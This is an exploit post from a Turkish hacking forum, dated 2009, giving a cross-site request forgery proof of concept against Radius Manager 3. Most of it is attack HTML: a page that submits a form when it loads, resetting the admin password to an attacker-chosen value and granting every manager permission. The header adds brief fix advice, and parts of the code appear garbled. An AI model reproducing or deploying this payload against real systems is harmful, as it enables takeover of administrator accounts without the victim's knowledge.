ROOT
FORUM ROOT
PORTAL ROOT
CYBER NAVIGATION
DÖKÜMANLAR
DÖKÜMAN EKLE
DOWNLOAD/DOSYA ARSIVI
BASINDA CW
CYBER ACADEMY
ORGANIZASYON
NELER YAPTIK?
OPERASYON YÖNETIM SISTEMI
GÖREV ORG. BASVURU
YÖNETICI BASVURU FORMU
MISYON
KURALLAR
KEFALET
KEFIL HAVUZU
MEMBER NAVIGATION
YENI ÜYE BASVURU
PROFIL
MEMBER NETWORK
SIFREMI UNUTTUM
ÖZEL MESAJLARIM
ONAY E-POSTA GÖNDER
Root
>
Exploits / Vulnerabilities
> Radius Manager 3 ~ XSRF Vuln.
Radius Manager 3 ~ XSRF Vuln. | Cyber-Warrior Information Technology's World
Madde
Author :
Bug Researchers/DaiMon
Date :
18.04.2009 16:19:02
#
Radius Manager 3 ~ XSRF Vuln.
[Full Screen Display]
< ------------------- header data start ------------------- > ############################################################# # Application Name : Radius Manager 3 # XSRF # Vulnerable Type : XSRF # Infection : Uzaktan otomatik olarak admin pass change edilebilir. # Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmeli, eski sifre sorulmalidir. # author : Bug Researchers/DaiMon # Script Fiyati : $99,00! ############################################################ < ------------------- header data end of ------------------- > < -- bug code start -- > <b0dy onLoad=Submit();> <script>function Submit[]{document.DaiMon.submit();}</script> <form name=form1 action=admin.php?cont=update_manager&managername=admin method=post> <td colspan=5 class=normal><strong>admin</strong></td> <td colspan=5 class=normal><input name=enablemanager type=checkbox id=enablemanager value=1 checked> <td colspan=5 class=normal><input name=password1 type=password class=normal id=password1 value=DaiMon maxlength=32 size=18> <td colspan=5 class=normal><input name=password2 type=password class=normal id=password2 value=DaiMon maxlength=32 size=18> <input name=perm_listusers type=checkbox id=perm_listusers value=1 checked></td> <input name=perm_listmanagers type=checkbox id=perm_listmanagers value=1 checked> <input name=perm_listservices type=checkbox id=perm_listservices value=1 checked> <input name=perm_createusers type=checkbox id=perm_createusers value=1 checked> <input name=perm_createmanagers type=checkbox id=perm_createmanagers value=1 checked> <input name=perm_createservices type=checkbox id=perm_createservices value=1 checked> <input name=perm_editusers type=checkbox id=perm_editusers value=1 checked> <input name=perm_editmanagers type=checkbox id=perm_editmanagers value=1 checked> <input name=perm_editservices type=checkbox id=perm_editservices value=1 checked> <input name=perm_deleteusers type=checkbox id=perm_deleteusers value=1 checked> <input name=perm_deletemanagers type=checkbox id=perm_deletemanagers value=1 checked> <input name=perm_deleteservices type=checkbox id=perm_deleteservices value=1 checked> <input name=perm_listinvoices type=checkbox id=perm_listinvoices value=1 checked> <input name=perm_listonlineusers type=checkbox id=perm_listonlineusers value=1 checked> <input name=perm_listallinvoices type=checkbox id=perm_listallinvoices value=1 checked> <input name=perm_logout type=checkbox id=perm_logout value=1 checked> <input name=perm_editinvoice type=checkbox id=perm_editinvoice value=1 checked> <input name=perm_addcredits type=checkbox id=perm_addcredits value=1 checked> <input name=perm_listpayouts type=checkbox id=perm_listpayouts value=1 checked> <input name=perm_trafficreport type=checkbox id=perm_trafficreport value=1 checked> <input name=perm_makepayouts type=checkbox id=perm_makepayouts value=1 checked> <input name=perm_cardsys type=checkbox id=perm_cardsys value=1 checked> <input type=submit name=Submit value=update manager> < -- bug code end of -- >
Cyber-Warrior TIM All Legal and illegal Rights Reserved.\CWDoktoray 2001©
